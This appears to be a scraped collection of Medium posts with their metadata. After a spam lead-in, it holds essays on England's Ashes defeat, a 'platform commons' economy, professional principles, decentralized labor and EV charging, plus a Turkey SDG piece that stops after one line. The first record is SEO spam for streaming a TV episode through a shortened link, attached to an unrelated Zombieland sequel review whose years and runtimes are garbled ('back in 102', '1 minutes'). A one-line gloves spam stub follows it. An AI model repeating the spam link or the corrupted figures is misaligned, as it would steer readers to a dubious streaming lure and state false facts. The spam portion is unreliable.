Criminal Justice,Criminal Justice 2x1,Criminal Justice S2E1,Criminal Justice S2xE1,Criminal Justice 2x1,Criminal Justice S2E1,Criminal Justice Cast,Criminal Justice Prime Video,Criminal Justice Season 2,Criminal Justice Episode 1,Criminal Justice Watch Online, Criminal Justice Season 2 Episode 1, Watch Criminal Justice Season 2 Episode 1 Online,Criminal Justice Eps. 2, Criminal Justice Episode 1
Watch Criminal Justice Season 2 Episode 1 (Streaming) ☞ https://cutt.ly/dh1YueG
Criminal Justice
Criminal Justice 2x1
Criminal Justice S2E1
Criminal Justice Cast
Criminal Justice #Episode 1
Criminal Justice Viaplay
Criminal Justice Eps. 2
Criminal Justice Season 2
Criminal Justice Episode 1
Criminal Justice Premiere
Criminal Justice New Season
Criminal Justice Full Episodes
Criminal Justice Watch Online
Criminal Justice Season 2 Episode 1
Watch Criminal Justice Season 2 Episode 1 Online[
❖ ALL CATEGORY WATCHTED ❖
An action story is similar to adventure, and the protagonist usually takes a risky turn, which leads to desperate scenarios (including explosions, fight scenes, daring escapes, etc.). Action and adventure usually are categorized together (sometimes even while “action-adventure”) because they have much in common, and many stories are categorized as both genres simultaneously (for instance, the James Bond series can be classified as both).
Continuing their survival through an age of a Zombie-apocalypse as a makeshift family, Columbus (Jesse Eisenberg), Tallahassee (Woody Harrelson), Wichita (Emma Stone), and Little Rock (Abagail Breslin) have found their balance as a team, settling into the now vacant White House to spend some safe quality time with one another as they figure out their next move. However, spend time at the Presidential residents raise some uncertainty as Columbus proposes to Wichita, which freaks out the independent, lone Criminal Justice out, while Little Rock starts to feel the need to be on her own. The women suddenly decide to escape in the middle of the night, leaving the men concerned about Little Rock, who’s quickly joined by Berkley (Avan Jogia), a hitchhiking hippie on his way to place called Babylon, a fortified commune that’s supposed to be safe haven against the zombies of the land. Hitting the road to retrieved their loved one, Tallahassee and Columbus meet Madison (Zoey Deutch), a dim-witted survivor who takes an immediate liking to Columbus, complicating his relationship with Wichita.
❖ ANALYZER GOOD / BAD ❖
To be honest, I didn’t catch Zombieland when it first got released (in theaters) back in 102. Of course, the movie pre-dated a lot of the pop culture phenomenon of the usage of zombies-esque as the main antagonist (i.e Game of Thrones, The Maze Runner trilogy, The Walking Dead, World War Z, The Last of Us, etc.), but I’ve never been keen on the whole “Zombie” craze as others are. So, despite the comedy talents on the project, I didn’t see Zombieland….until it came to TV a year or so later. Surprisingly, however, I did like it. Naturally, the zombie apocalypse thing was fine (just wasn’t my thing), but I really enjoyed the film’s humor-based comedy throughout much of the feature. With the exception of 102’s Shaun of the Dead, majority of the past (and future) endeavors of this narrative have always been serious, so it was kind of refreshing to see comedic levity being brought into the mix. Plus, the film’s cast was great, with the four main leads being one of the film’s greatest assets. As mentioned above, Zombieland didn’t make much of a huge splash at the box office, but certainly gained a strong cult following, including myself, in the following years.
Flash forward a decade after its release and Zombieland finally got a sequel with Zombieland: Double Tap, the central focus of this review post. Given how the original film ended, it was clear that a sequel to the 102 movie was indeed possible, but it seemed like it was in no rush as the years kept passing by. So, I was quite surprised to hear that Zombieland was getting a sequel, but also a bit not surprised as well as Hollywood’s recent endeavors have been of the “belated sequels” variety; finding mixed results on each of these projects. I did see the film’s movie trailer, which definitely was what I was looking for in this Zombieland 2 movie, with Eisenberg, Harrelson, Stone, Breslin returning to reprise their respective characters again. I knew I wasn’t expecting anything drastically different from the 102 movie, so I entered Double Tap with good frame of my mind and somewhat eagerly expecting to catch up with this dysfunctional zombie killing family. Unfortunately, while I did see the movie a week after its release, my review for it fell to the wayside as my life in retail got a hold of me during the holidays as well as being sick for a good week and half after seeing the movie. So, with me still playing “catch up” I finally have the time to share my opinions on Zombieland: Double Tap. And what are they? Well, to be honest, my opinions on the film was good. Despite some problems here and there, Zombieland: Double Tap is definitely a fun sequel that’s worth the decade long wait. It doesn’t “redefine” the Zombie genre interest or outmatch its predecessor, but this next chapter of Zombieland still provides an entertaining entry….and that’s all that matters.
Returning to the director’s chair is director Ruben Fleischer, who helmed the first Zombieland movie as well as other film projects such as 1 Minutes or Less, Gangster Squad, and Venom. Thus, given his previous knowledge of shaping the first film, it seems quite suitable (and obvious) for Fleischer to direct this movie and (to that affect), Double Tap succeeds. Of course, with the first film being a “cult classic” of sorts, Fleischer probably knew that it wasn’t going to be easy to replicate the same formula in this sequel, especially since the 1-year gap between the films. Luckily, Fleischer certainly excels in bringing the same type of comedic nuances and cinematic aspects that made the first Zombieland enjoyable to Double Tap; creating a second installment that has plenty of fun and entertainment throughout. A lot of the familiar / likeable aspects of the first film, including the witty banter between four main lead characters, continues to be at the forefront of this sequel; touching upon each character in a amusing way, with plenty of nods and winks to the original 102 film that’s done skillfully and not so much unnecessarily ham-fisted. Additionally, Fleischer keeps the film running at a brisk pace, with the feature having a runtime of 1 minutes in length (one hour and thirty-nine minutes), which means that the film never feels sluggish (even if it meanders through some secondary story beats / side plot threads), with Fleischer ensuring a companion sequel that leans with plenty of laughter and thrills that are presented snappy way (a sort of “thick and fast” notion). Speaking of which, the comedic aspect of the first Zombieland movie is well-represented in Double Tap, with Fleischer still utilizing its cast (more on that below) in a smart and hilarious by mixing comedic personalities / personas with something as serious / gravitas as fighting endless hordes of zombies every where they go. Basically, if you were a fan of the first Zombieland flick, you’ll definitely find Double Tap to your liking.
In terms of production quality, Double Tap is a good feature. Granted, much like the last film, I knew that the overall setting and background layouts weren’t going to be something elaborate and / or expansive. Thus, my opinion of this subject of the movie’s technical presentation isn’t that critical. Taking that into account, Double Tap does (at least) does have that standard “post-apocalyptic” setting of an abandoned building, cityscapes, and roads throughout the feature; littered with unmanned vehicles and rubbish. It certainly has that “look and feel” of the post-zombie world, so Double Tap’s visual aesthetics gets a solid industry standard in my book. Thus, a lot of the other areas that I usually mentioned (i.e set decorations, costumes, cinematography, etc.) fit into that same category as meeting the standards for a 12 movie. Thus, as a whole, the movie’s background nuances and presentation is good, but nothing grand as I didn’t expect to be “wowed” over it. So, it sort of breaks even. This also extends to the film’s score, which was done by David Sardy, which provides a good musical composition for the feature’s various scenes as well as a musical song selection thrown into the mix; interjecting the various zombie and humor bits equally well.
There are some problems that are bit glaring that Double Tap, while effectively fun and entertaining, can’t overcome, which hinders the film from overtaking its predecessor. Perhaps one of the most notable criticism that the movie can’t get right is the narrative being told. Of course, the narrative in the first Zombieland wasn’t exactly the best, but still combined zombie-killing action with its combination of group dynamics between its lead characters. Double Tap, however, is fun, but messy at the same time; creating a frustrating narrative that sounds good on paper, but thinly written when executed. Thus, problem lies within the movie’s script, which was penned by Dave Callaham, Rhett Reese, and Paul Wernick, which is a bit thinly sketched in certain areas of the story, including a side-story involving Tallahassee wanting to head to Graceland, which involves some of the movie’s new supporting characters. It’s fun sequence of events that follows, but adds little to the main narrative and ultimately could’ve been cut completely. Thus, I kind of wanted see Double Tap have more a substance within its narrative. Heck, they even had a decade long gap to come up with a new yarn to spin for this sequel…and it looks like they came up a bit shorter than expected.
Another point of criticism that I have about this is that there aren’t enough zombie action bits as there were in the first Zombieland movie. Much like the Walking Dead series as become, Double Tap seems more focused on its characters (and the dynamics that they share with each other) rather than the group facing the sparse groupings of mindless zombies. However, that was some of the fun of the first movie and Double Tap takes away that element. Yes, there are zombies in the movie and the gang is ready to take care of them (in gruesome fashion), but these mindless beings sort take a back seat for much of the film, with the script and Fleischer seemed more focused on showcasing witty banter between Columbus, Tallahassee, Wichita, and Little Rock. Of course, the ending climatic piece in the third act gives us the best zombie action scenes of the feature, but it feels a bit “too little, too late” in my opinion. To be honest, this big sequence is a little manufactured and not as fun and unique as the final battle scene in the first film. I know that sounds a bit contrive and weird, but, while the third act big fight seems more polished and staged well, it sort of feels more restricted and doesn’t flow cohesively with the rest of the film’s flow (in matter of speaking).
What’s certainly elevates these points of criticism is the film’s cast, with the main quartet lead acting talents returning to reprise their roles in Double Tap, which is absolutely the “hands down” best part of this sequel. Naturally, I’m talking about the talents of Jessie Eisenberg, Woody Harrelson, Emma Stone and Abigail Breslin in their respective roles Zombieland character roles of Columbus, Tallahassee, Wichita, and Little Rock. Of the four, Harrelson, known for his roles in Cheers, True Detective, and War for the Planet of the Apes, shines as the brightest in the movie, with dialogue lines of Tallahassee proving to be the most hilarious comedy stuff on the sequel. Harrelson certainly knows how to lay it on “thick and fast” with the character and the s**t he says in the movie is definitely funny (regardless if the joke is slightly or dated). Behind him, Eisenberg, known for his roles in The Art of Self-Defense, The Social Network, and Batman v Superman: Dawn of Justice, is somewhere in the middle of pack, but still continues to act as the somewhat main protagonist of the feature, including being a narrator for us (the viewers) in this post-zombie apocalypse world. Of course, Eisenberg’s nervous voice and twitchy body movements certainly help the character of Columbus to be likeable and does have a few comedic timing / bits with each of co-stars. Stone, known for her roles in The Help, Superbad, and La La Land, and Breslin, known for her roles in Signs, Little Miss Sunshine, and Definitely, Maybe, round out the quartet; providing some more grown-up / mature character of the group, with Wichita and Little Rock trying to find their place in the world and how they must deal with some of the party members on a personal level. Collectively, these four are what certainly the first movie fun and hilarious and their overall camaraderie / screen-presence with each other hasn’t diminished in the decade long absence. To be it simply, these four are simply riot in the Zombieland and are again in Double Tap.
With the movie keeping the focus on the main quartet of lead Zombieland characters, the one newcomer that certainly takes the spotlight is actress Zoey Deutch, who plays the character of Madison, a dim-witted blonde who joins the group and takes a liking to Columbus. Known for her roles in Before I Fall, The Politician, and Set It Up, Deutch is a somewhat “breath of fresh air” by acting as the tagalong team member to the quartet in a humorous way. Though there isn’t much insight or depth to the character of Madison, Deutch’s ditzy / air-head portrayal of her is quite hilarious and is fun when she’s making comments to Harrelson’s Tallahassee (again, he’s just a riot in the movie).
The rest of the cast, including actor Avan Jogia (Now Apocalypse and Shaft) as Berkeley, a pacifist hippie that quickly befriends Little Rock on her journey, actress Rosario Dawson (Rent and Sin City) as Nevada, the owner of a Elvis-themed motel who Tallahassee quickly takes a shine to, and actors Luke Wilson (Legally Blonde and Old School) and Thomas Middleditch (Silicon Valley and Captain Underpants: The First Epic Movie) as Albuquerque and Flagstaff, two traveling zombie-killing partners that are mimic reflections of Tallahassee and Columbus, are in minor supporting roles in Double Tap. While all of these acting talents are good and definitely bring a certain humorous quality to their characters, the characters themselves could’ve been easily expanded upon, with many just being thinly written caricatures. Of course, the movie focuses heavily on the Zombieland quartet (and newcomer Madison), but I wished that these characters could’ve been fleshed out a bit.
Lastly, be sure to still around for the film’s ending credits, with Double Tap offering up two Easter Eggs scenes (one mid-credits and one post-credit scenes). While I won’t spoil them, I do have mention that they are pretty hilarious.
❖ FINAL THOUGHTS ❖
It’s been awhile, but the Zombieland gang is back and are ready to hit the road once again in the movie Zombieland: Double Tap. Director Reuben Fleischer’s latest film sees the return the dysfunctional zombie-killing makeshift family of survivors for another round of bickering, banting, and trying to find their way in a post-apocalyptic world. While the movie’s narrative is a bit messy and could’ve been refined in the storyboarding process as well as having a bit more zombie action, the rest of the feature provides to be a fun endeavor, especially with Fleischer returning to direct the project, the snappy / witty banter amongst its characters, a breezy runtime, and the four lead returning acting talents. Personally, I liked this movie. I definitely found it to my liking as I laugh many times throughout the movie, with the main principal cast lending their screen presence in this post-apocalyptic zombie movie. Thus, my recommendation for this movie is favorable “recommended” as I’m sure it will please many fans of the first movie as well as to the uninitiated (the film is quite easy to follow for newcomers). While the movie doesn’t redefine what was previous done back in 102, Zombieland: Double Tap still provides a riot of laughs with this make-shift quartet of zombie survivors; giving us give us (the viewers) fun and entertaining companion sequel to the original feature.
|
https://medium.com/criminal-justice-s02e01/criminal-justice-s02e01-series-2-episode-1-stream-75617ea830dd
|
['Nada Dahlia']
|
2020-12-23 17:52:54.878000+00:00
|
['Adventure', 'Crime', 'Mystery']
|
Guantes de nitrilo Disponible en stock
|
Eloquent Speaker and Cosponsor of When all Matters. Father of three and lover of sports.
|
https://medium.com/@veramehkomandoas/guantes-de-nitrilo-disponible-en-stock-d2285ba81a81
|
['Verameh Komandoas']
|
2020-12-25 00:49:58.992000+00:00
|
['Science', 'Business Development', 'Covid 19', 'Healthcare', 'Gloves']
|
Black Tuesday (Or, Musings on the Point of it All)
|
This is a nightmare you can’t wake from no matter how hard you try.
A mess. A disaster. A humiliation. A complete embarrassment.
At around ten to one in the morning, as most of us were all drifting into the fitful alcohol-induced kip that marks this time of year as one of headaches and red-eye, Cameron Green of the Australia national cricket team castles James Anderson in Melbourne and Australia retain the Ashes after an England capitulation that took only eleven-and-a-bit days of test cricket to move from hope to abject humiliation.
Cue the lip-biting, brow-furrowing and face-wiping.
Joe Root is wheeled in front of the cameras and microphones. Right now, actually, not the dejected and broken cliche, but answering questions and going through the motions with the apathy of someone who is quite simply sick of it all. For weeks, chat from the England camp was one of corporate positivity. A misplaced upbeat-ism in the face of a potential looming disaster that can only be rivalled by the tone of the laughter over-heard by the cleaning staff at 10 Downing Street, as they sweep up the crumbs of Jacob’s Cream Cracker and Wensleydale from the floor, and throw yet another empty bottle of Merlot into the recycling bin with just enough force to let out a hint of that building frustration.
Right now, though, Root is broken. He knows this is the career-ender. The series has been such a disaster it is the point of no recovery. Less a Battle of Thermopylae brave fight to the death, more surrendering to a couple of French fishing boats while fighting over the last remaining scallops in the English Channel.
Back home, the knives are already out. The blame is already being proportioned. The old four-yearly Christmas favourites are being trotted out. The County Championship is not fit for purpose. The Hundred. Too much cricket. Not enough preparation. Focus on the white ball. The decline of cricket outside of the private school select. Some answers are obvious but unfeasible. Some not so much so but do-able. Compromises are discussed. Inevitably, the point is raised: “If this is so difficult to sort out, and so many people with so much to lose unwilling to do so, what’s the point of doing all of this at all?”
The fragile system of which England cricket is built, patched up for so many years with duct tape and superglue, has finally finished its slow collapse.
|
https://medium.com/@nickrchambers1/black-tuesday-or-musings-on-the-point-of-it-all-f289a66fddfd
|
['Nick Hayhoe']
|
2021-12-30 09:06:10.524000+00:00
|
['The Ashes', 'Cricket']
|
If Not Now, When, And Who With? Thoughts on Social Transformation Toward the Adoption of Platform Commons
|
The Big Five in tech have power exceeding that of governments or even that of other companies combined for that matter. These, and companies like them, must be reined in, transformed into a common resource to serve the public good. The attempts to address the sheer power of these behemoths via distributed cooperative alternatives — exist — but have failed.
So, I’d like to propose a synthesis of sorts. Let’s take Amazon. What is it? It is a marketplace aimed at providing the best quality product for the lowest price. This, in fact, should be applauded. The issue is the rewards go to a few, most notably Jeff Bezos, who’s fortune is bound to exceed $200 billion in the near future, especially considering the lockdown nature of the pandemic may well continue for longer than expected, particularly if the virus continues to adapt beyond the scope of vaccination many scientists fear.
It seemed at one point there was an air of solidarity — initially — during lockdown, but now it seems people are majorly for themselves and just want to keep tight (suffer quietly) and stay secure, while many others just want to get rich. There is no collective positive vision for the future (which is highly problematic), other than extracting wealth from Africa via Bitcoin, in some flailing attempt to give that platform once incubated by a combination of anarchist cypherpunks and Austrian-school-bashing techno-libertarians an air of functionality, when in reality it is a Ponzi scheme, now aimed at exploiting Africa using smooth Silicon Valley rhetoric, a repackaging of an old and tired story.
So let’s return to Amazon. It’s said Jeff Bezos could pay all Amazon workers over $200,000 and still have more than a pre-pandemic net worth. Bezos deflects this by saying he owns a small portion of the company and the majority goes to other shareholders — so let’s address them as well. What if we then combined the Big Five and other top performing companies into one mega-corporate structure and have dividends paid out to everyone? Whatever income insufficiencies, with a nod to Modern Monetary Theory, nations can simply continue deficit spending, issuing Jubilees or debt cancelations, until currency, at least as we know it, is no longer needed, as the extractive economy is translated into an equalized transfer economy based on material resources and human capacity highly augmented or replaced by highly adaptive and knowledgeable tools, the part of ourselves we call machines.
The suitcase phrase for the system to come can be called a platform commons. More than just myself and a handful of others need to discuss, deliberate, and implement these views. The major problem is that well funded mass media outlets continue to distort the dialogue in the interests of elite power. These reactive minds would have you think I want a post-scarcity society to deny my own responsibility, when in fact, I advocate for this umbrella term to ensure myself and others can become more responsible, by enabling the active monitoring of all life process we depend on. It is absolutely appalling to not address the deep seated and systemic greed that has plagued the world with destitution, mentally and physically. Leaving it to the market is truly irresponsible, destroying the future of diversity of life on Earth, if not life itself.
“But what can I do?” you might ask. ‘Netflix and chill’ until it all blows over and eventually works out? And when will that be? When we and all life on Earth are dead?… I too feel complicit. The fact I know this much (and I feel I know very little), with my inherent Protestant (Western) indoctrination wishing to “save Souls” and “do Good,” I’m compelled to continue making prison cell scratch marks into the digital void. I am, or anyone else that may take up this line of thought and potential action, be just another remark soon forgotten, if a substantial community, a new rising minority, fails to materialise. This minority must be highly pragmatic, but coordinated, adopting a variety of ideologies, utilizing an array of disciplines, while accepting none if but with the lightest touch, acting in ways that may seem counterintuitive, while ultimately, perhaps at a crawl, then all at once: delivering us from bondage.
|
https://medium.com/@nathancravens/if-not-now-when-and-who-with-6c1a296b6ab1
|
['Nathan Cravens']
|
2020-12-22 16:11:43.527000+00:00
|
['Platform Economy', 'Social Change']
|
My Six Guiding Professional Principles
|
Work on anything long enough and you will start to develop a theory, a philosophy on the how and why of it. Play a sport for years, and you will develop a system of which attributes and strategies are best. Play an instrument, and you will also find techniques and styles that best suit you.
Work for a while and a set of guiding principles will emerge as well. For better or worse, work is the single thing that will take up more of our time and almost certainly the most mental energy throughout our lives. So, it’s no surprise that after a while you discover principles that you can apply.
Principles are useful because they help guide you. They help you make trade-offs, prioritize, and navigate the tricky situations we all find ourselves in.
Here are mine.
1 — Most business problems are people problems. Understanding people better helps business.
Yes, a lot of business problems are technical, logistical, financial, etc but when you boil the rest down, it comes to understanding how to get people to act in certain ways. Think about it.
Marketing — How do we create messages that resonate with and motivate people?
Product — How do we create tools that are empowering for people?
Sales — How do we create valuable relationships with people?
Management — How do we create environments for happy, productive people?
We want people to open emails, click links, and add to their carts. We want people to listen to us in meetings, we want people to learn how to use our tools in the right way, we want to be able to communicate all this easier and more effectively.
It would be wise to spend more time learning about psychology and the intersections of behavioral science within our work. Humans are complicated and unique. We don’t always understand the reason for our own actions, much less the actions of others.
However, where we do understand people there is a great opportunity. This is the basis of design-thinking, UI/UX frameworks, neuromarketing, copywriting, management techniques, and more.
We could all do a lot better if we took stock of how well our business practices align with the current understanding of human nature.
2 — The product is the most important aspect of the company
You walk into a car dealership’s showroom. It’s beautiful, the architecture has been designed to make you excited about being there. A nice-looking salesman comes up and connects with you immediately. He begins to talk to you about their top-line model that is front-and-center. It’s magnificent and appealing in every way. The only problem? It’s a sports car and you came looking for a truck.
Now imagine a similar scenario where the dealership sells nothing but trucks. Yet, when you test-drive it, it has some nice features but is missing a few fundamentals. It has a heated steering wheel and remote start, but not enough torque or bed-space for you.
These are two examples to demonstrate how important getting the product right is. You can have the best design, marketing, sales, and operations available but if you’re not getting to the heart of the customer’s needs, it doesn’t matter. Similarly, you can be addressing needs only in ways that are flashy or easy, but not substantive, and still fail.
I know it’s cheating, but I’ll use Tesla as an example here. No marketing, no showrooms, no PR team, limited sales infrastructure. The product on its own is so good that they don’t need the rest to help paper over cracks.
Often, when you think you have a marketing or sales problem, you really have a product problem. Think back to the early days of Uber. They had cracks all over the place. Sometimes unreliable service, high-profile incidents, glitchy app, etc. They maintained momentum because the product itself was much better than the alternative.
3 — Ego is the enemy
People’s egos are typically the biggest cultural issue in any organization.
Ego is the part of ourselves that exists to reinforce and support our self-importance and identity.
Ego is especially rampant at work because people are desperate to have themselves perceived as smart, hardworking, valuable individuals. To lose that perception and status is often to lose your job.
Here are some of the negative impacts of the ego at work:
It leads to HPPO decision making, instead of decisions made collectively, or by the people closest to the problem.
People behave in ways that reflect well on them, instead of on the team, slowly creating a toxic environment.
People are afraid to admit to mistakes or ask for help. In the worst-case, this can create all kinds of problems, or in the best-case still prevents learning.
People get too attached to outcomes, and not enough to process. Nobody gives anything enough time to breathe and be understood.
The list goes on.
When you create a low-ego environment, people feel compelled to speak up, to mess up, to be creative and risky for the greater good of the team. With the freedom to experiment and fail, more creative solutions and lessons are found. When you foster an environment where people can be vulnerable, connections and teamwork are better.
We all have egos, the failure in realizing how much it is impacting our thoughts and behavior is the real mistake. Ego is the enemy, fight it.
4 — Ruthlessly Pareto prioritizing is key
When you think about it, the word “priorities” is in itself an oxymoron. Maybe it is possible to have multiple priorities but that number tops out at 3. If everything is a priority then nothing is a priority. In the long run (and that is the only run that should matter), doing the right things well is more important than doing more things. The problem is that sometimes you have managers/management rolling out priority lists that are 5+ items long.
Velocity reminds us that there is a difference in speed and direction. You can have a great ship with excellent sailors going full steam ahead. If you’re sailing in the wrong direction, it won’t matter.
I say “Pareto prioritizing” because I am a big believer in the Pareto principle. That 80% of the effects result from 20% of the causes. Whatever product or service you’re working on, there are likely a few things that end up delivering the most value. I believe it is often better to double-down on strengths, rather than supplement weaknesses. The worst strategies are the ones where you say, “we’ll do a bit of everything to cover our bases”. It sounds safe but is actually risky because you a) risk losing the opportunity to optimize and b) end up doing a lot okay but nothing great.
This is why you have to be ruthless in prioritizing. Look for the few things that make your offer unique and valuable, and focus on improving those. Let the rest sit on the wayside to be revisited later.
5 — Decision-making is more important and flawed than we realize
There’s a depressing facet of work that goes under-recognized. A lot of work is either correcting for mistakes or realizing that the ship you’re sailing has been heading in the wrong direction and now you must course-correct with fewer resources. (Can you tell I like this sailing metaphor?)
It all starts when a decision is made on what to work on and how. The problem is that there are all sorts of landmines that jeopardize the process, unseen and only obvious after-the-fact.
We humans don’t do well deciding under uncertainty. Availability bias, decision fatigue, fundamental attribution error, survivorship bias, gambler’s fallacy, etc. None of us are immune to taking mental shortcuts in these situations, but the more aware of them we are, the better we can side-step them on the path to success.
It’s always been surprising to me that considering the importance of getting consequential decisions right, few organizations deploy frameworks that act as guardrails to guiding themselves towards the best ones. What usually happens is that people who are considered to have the most experience and thus best judgment gather data and decide on their own. Is this the best we can do?
We should ask more of ourselves by asking questions like:
“Are we making this decision now because we are tired of deliberating?”
“Who is the best person to make this decision?”
“Is this decision reversible or irreversible? How does that change things?”
“How confident do we need to be before deciding? What do we need to increase our confidence level?”
Successes and failures can be followed back to a single decision that resulted in a string of (potentially forced) decisions. Obviously, we can’t get them all right and it’s impossible to know the future, but we can get much better.
6 — Don’t take yourself or the work too seriously
Don’t get me wrong here, work is serious. Your work affects other people’s work which affects their professional and personal lives, as well as your customers. You should do your best to show up each day as a person that can help others. However, it’s useful to remember that unless you’re in the life-saving business or pulling big levers in the economy, to not take it too seriously.
People are unknowingly/unwillingly self-absorbed and most of what you do won’t impact them for too long. Indeed, a lot of services are meant to be as out-of-sight, out-of-mind as possible.
They don’t care about your company as much as what you can do for them. They don’t want to be part of your company’s “community”. They don’t want to get your newsletter so they can keep up with what you’re doing. You shouldn’t invest much in these tertiary things either. Focus on how well you’re delivering your unique value and put the rest on the back burner.
Forgive me for getting too philosophical here, but most of your work won’t really matter either. Think about how stressed you might’ve gotten at a job you left years ago. How often do you still think about it? That work might not be used in that company anymore anyway. Think about all the brilliant doctors, engineers, writers, etc who lived only 100–200 years ago. You have no idea who they are or what their work was. The same will happen to you.
Don’t get too angry with yourself, nor with others. It’s not worth it when it won’t matter. Keep the big picture in mind and ask yourself if this is something that will matter to you or others in a few hours, a few weeks, a year, or 5 years.
Your mental state is crucial, you have to live with yourself 100% of the time. Few things at work are worth ruining your mental state for too long. Apply some stoicism at work and see if it doesn’t make your life a bit easier.
Conclusion
A theme of mine here is understanding. The better you understand yourself, your coworkers, your customers, your market, etc the better off you will be. This includes recognizing and correcting for blind spots in your understanding. That understanding is powerful, though. It allows you to prioritize and decision-make much easier.
My hope is that these principles are useful for you as you evaluate your own philosophy of work.
|
https://medium.com/@sloanthomas/my-six-guiding-professional-principles-54f5599a2f49
|
['Thomas Sloan']
|
2020-12-11 20:37:57.674000+00:00
|
['Professional Development', 'Work', 'Philosophy', 'Psychology']
|
Decentralized Labor and the Future of Work
|
Photo by rawpixel on Unsplash
Digitally decentralized labor, in simple terms, is when large tasks are broken into independent tasks — it’s the assembly line for the thought economy. With advances in smart contract technology, it may just be the future of work. Much like the far-reaching application of the assembly line in optimizing manufacturing processes, decentralized labor can be applied in a number of ways.
Google has relied on decentralized labor for more than a decade, and you’ve (probably, unwittingly) participated. When Google worked to digitize the archives of the New York Times and many books in the early-oughts, they ran into a major problem: their Optical Character Recognition (OCR) software was only 80% accurate and required some babysitting. For each page the company scanned, they were constantly tweaking the software to teach it to recognize new words, fonts, and variants.
In time, the company started working with reCAPTCHA to streamline their word recognition process. By asking individual internet users to identify a string of words before accessing their site, Google killed two birds with one stone: (a) they helped fight fraudulent traffic, and (b) they got real, live humans to train their software. You helped Google identify that smudged or ill-scanned word to help bolster their machine learning. Today, Google continues this practice with images to train its driverless car software.
The human contribution of this short and simple task unlocked tremendous value for Google and the website owner — and smart contracts enable the individual to get in on the action as well.
The Digital Assembly Line & Smart Contracts as a Manager
When problems can be factored into fungible work units, the organization can distribute those tasks to individuals and create a digital assembly line.
Given the correct framework, like HUMAN Protocol, smart contracts play middle-manager: offering an exchange where jobs can be bid on and accepted in a fair way, ensuring the successful completion of a task, evaluating and confirming quality, and managing compensation (which is especially important when managing micro-payments).
Photo by Kaitlyn Baker on Unsplash
The first HUMAN Protocol application is hCaptcha, a CAPTCHA-like offering which performs similar bot-fighting and image-identifying functions, but also compensates the website host itself for their role in filling the top of the funnel. The company also plans an exchange where an individual can log in and perform these tasks.
Smart contract-based management represents not only a significant improvement over Amazon Mechanical Turk but also, perhaps, the future of work itself.
|
https://medium.com/blockstreethq/decentralized-labor-and-the-future-of-work-c6a5c6881522
|
['Andrew J. Chapin']
|
2018-10-18 23:48:46.210000+00:00
|
['Decentralization', 'Blockchain', 'Bhq Contributors', 'Cryptocurrency', 'Bitcoin']
|
2020: Year of the EV Launchpad
|
(Illustration by Mike Bloom)
Lets face it, 2020 has been one of the most hectic and confusing years we may ever experience in our lives. Yet despite a global pandemic and general social unrest, 2020 has somehow been an important year for clean energy and climate change. For me, the commitment of regulators, utilities, consumers, and finally automakers has signaled the strongest commitment to electric vehicles and charging infrastructure we have ever seen — each providing a ‘launchpad’ if you will to get electric vehicles (and the infrastructure to make them go) off the ground.
EV Charging North Stars: States & Utilities
In the United States, the focal point of this progress has been state action. Kick-started with mitigation funding from the VW diesel emissions settlement, California and New York are leading the charge by committing millions in EV charging programs to bring over 170,000 new stations online by 2025. These two coastal heavyweights are essential to long-term transportation change, and their effort to make charge station adoption attractive is unmatched across the country.
It is important to call out how these two states have been north stars for many others taking their own big step forward in EV charging. State government and utilities play an important role in increasing electric vehicle adoption in their backyards, and it starts with infrastructure. The few states and utilities operating make-ready programs today have ‘passed the EV chasm’ so to speak, leading with future-proofing requirements for charging in order to achieve customer choice and data transparency. This includes chargers being networked and OCPP-compliant, a way for station operators to control pricing, access, and energy load for their stations. In what felt like a pipe dream just a few years ago electric vehicles and charging are quickly evolving into complete and complex solutions.
(Source: ‘Crossing the Chasm’ by Geoffrey Moore)
We’re now seeing first followers cross the chasm with state and utility incentive programs of their own. Workplace charger rebates, public DC Fast Chargers, utility fleet electrification — these are just some of the ways states are building an EV launchpad of their to meet carbon reduction targets. For many of the programs appetite is high and the incentive money dries up quickly. Perhaps a good problem to have for the many communities striving to be carbon neutral by 2030.
Automakers Are Investing In, Not Just Talking About EVs
For years, automakers have been floating the idea of an electric and autonomous future. While most release a new concept car for their trade shows (half of them missing a motor), this year definitely felt a little different.
In 2020, investment in U.S.-based manufacturing for electric vehicles has been a prime indicator of automaker’s commitment to electrification. Tesla has been an obvious leader with their Nevada Gigafactory, and soon to be operational ‘Giga Texas’ in Austin. General Motors has also kept busy announcing a $2 billion EV investment for their Tennessee plant, $150 million for their Michigan plant, and plenty of new electric models planned for years ahead. And let us not forget the ‘SPAC’-tacular public offerings with dozens of private EV companies making the leap to public in the blink of an eye.
According to IEA’s 2020 Global EV Outlook Report,
“EV sales reach almost 14 million in 2025 and 25 million vehicles in 2030, representing respectively 10% and 16% of all road vehicle sales. In a more ambitious scenario, the global EV stock reaches almost 80 million vehicles in 2025 and 245 million vehicles in 2030 (excluding two/threewheelers).”
Pretty soon we won’t be able to point to a few expensive Tesla models propping up the EV industry. PHEVs and BEVs are as popular as ever, and range anxiety is dwindling quickly as battery technology improves for both capacity and consumer’s wallets.
AmpUp: A Launchpad For Charging Access
I could not be more humbled to join AmpUp this year, a company truly proud to accelerate the electric vehicle evolution taking the United States and the rest of the world by storm. It is going to take a lot more than one car manufacturer or one charge station provider to make impactful change, and it is exciting to see station owners of different types take the leap to electric with us.
AmpUp is championing the movement to make private charging stations publicly accessible. We see this as yet another launchpad for widespread adoption of electric mobility, particularly in cities densely populated areas where home charging is not an option. EV drivers today and tomorrow need increased access to charging — and we all need cleaner electricity to power these stations.
With education and user experience at the forefront of what we do, AmpUp has been laser focused providing the tools to make EV charging easy and stress-free. Our software-first approach has opened so many doors for us in 2020, and there is nothing more rewarding than hearing how much our customers enjoy their charging experience. Additionally, we could not be more grateful for partners new and old helping workplaces, universities, multi-unit dwellings, and utilities become proud new operators of their own electric vehicle stations.
This year has helped me understand just how critical the EV launchpads all around us have been to sparking early industry success. I think I speak for everyone in the EV charging business when I say we can’t wait to see what launchpads emerge in 2021…
Stay driven,
Matt Bloom
(Thanks to Tom Sun for proofreading and commenting on this.)
|
https://medium.com/@matthewbloom/2020-year-of-the-ev-launchpad-987c032a1e6c
|
['Matt Bloom']
|
2020-12-22 02:53:15.100000+00:00
|
['Electric Vehicles', 'Energy', 'Mobility', 'Sustainability', 'Transportation']
|
Three policy innovations that Turkey is making through the SDG Impact Accelerator
|
This unique public-private partnership structure enabled the implementation of three innovative approaches for the international development and diplomatic communities:
